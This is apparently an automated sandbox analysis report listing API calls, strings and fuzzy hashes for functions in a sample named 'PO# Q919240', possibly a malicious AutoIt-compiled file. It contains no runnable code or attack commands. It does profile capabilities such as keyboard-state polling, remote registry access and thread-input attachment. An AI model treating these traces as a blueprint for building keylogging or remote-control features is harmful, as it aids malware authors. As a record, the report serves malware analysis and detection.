                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                Similarity
                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                Similarity
                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                APIs
                • _wcsncpy.LIBCMT ref: 00467490
                • _wcsncpy.LIBCMT ref: 004674BC
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • _wcstok.LIBCMT ref: 004674FF
                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                • _wcstok.LIBCMT ref: 004675B2
                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                • _wcslen.LIBCMT ref: 00467793
                • _wcscpy.LIBCMT ref: 00467641
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcslen.LIBCMT ref: 004677BD
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                Similarity
                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                • String ID: X
                APIs
                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                • _wcslen.LIBCMT ref: 0046CDB0
                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                Strings
                • NULL Pointer assignment, xrefs: 0046CEA6
                Similarity
                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                • String ID: NULL Pointer assignment
                APIs
                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                • _wcslen.LIBCMT ref: 004610A3
                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                • GetWindowRect.USER32(?,?), ref: 00461248
                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                Similarity
                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                • String ID: ThumbnailClass
                APIs
                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                • GetClientRect.USER32(?,?), ref: 00471A1A
                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                • DestroyIcon.USER32(?), ref: 00471AF4
                Similarity
                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                • String ID: 2
                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                • __swprintf.LIBCMT ref: 00460915
                • __swprintf.LIBCMT ref: 0046092D
                • _wprintf.LIBCMT ref: 004609E1
                Similarity
                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                Similarity
                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                Similarity
                • API ID: DestroyWindow
                • String ID: static
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                Similarity
                • API ID: ErrorMode$DriveType
                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                APIs
                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                • DeleteObject.GDI32(00520000), ref: 00470A04
                • DestroyIcon.USER32(004F0044), ref: 00470A1C
                • DeleteObject.GDI32(E580D2D9), ref: 00470A34
                • DestroyWindow.USER32(006C0061), ref: 00470A4C
                • DestroyIcon.USER32(?), ref: 00470A73
                • DestroyIcon.USER32(?), ref: 00470A81
                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                Similarity
                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                • VariantInit.OLEAUT32(?), ref: 004793E1
                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                • VariantClear.OLEAUT32(?), ref: 00479489
                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                • VariantClear.OLEAUT32(?), ref: 004794CA
                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                APIs
                • GetKeyboardState.USER32(?), ref: 0044480E
                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                • GetKeyState.USER32(000000A0), ref: 004448AA
                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                • GetKeyState.USER32(000000A1), ref: 004448D9
                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                • GetKeyState.USER32(00000011), ref: 00444903
                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                • GetKeyState.USER32(00000012), ref: 0044492D
                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                • GetKeyState.USER32(0000005B), ref: 00444958
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: InitVariant$_malloc_wcscpy_wcslen
                • String ID:
                • API String ID: 3413494760-0
                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressProc_free_malloc$_strcat_strlen
                • String ID: AU3_FreeVar
                • API String ID: 2634073740-771828931
                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                APIs
                • CoInitialize.OLE32 ref: 0046C63A
                • CoUninitialize.OLE32 ref: 0046C645
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                • IIDFromString.OLE32(?,?), ref: 0046C705
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                • API String ID: 2294789929-1287834457
                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                APIs
                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                • ImageList_EndDrag.COMCTL32 ref: 00471169
                • ReleaseCapture.USER32 ref: 0047116F
                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                • API String ID: 2483343779-2107944366
                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                • _wcslen.LIBCMT ref: 00450720
                • _wcscat.LIBCMT ref: 00450733
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$Window_wcscat_wcslen
                • String ID: -----$SysListView32
                • API String ID: 4008455318-3975388722
                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                • GetParent.USER32 ref: 00469C98
                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                • GetParent.USER32 ref: 00469CBC
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 2360848162-1403004172
                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                • String ID:
                • API String ID: 262282135-0
                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                APIs
                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                • String ID:
                • API String ID: 3771399671-0
                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00434643
                • GetForegroundWindow.USER32(00000000), ref: 00434655
                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                • String ID:
                • API String ID: 2156557900-0
                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
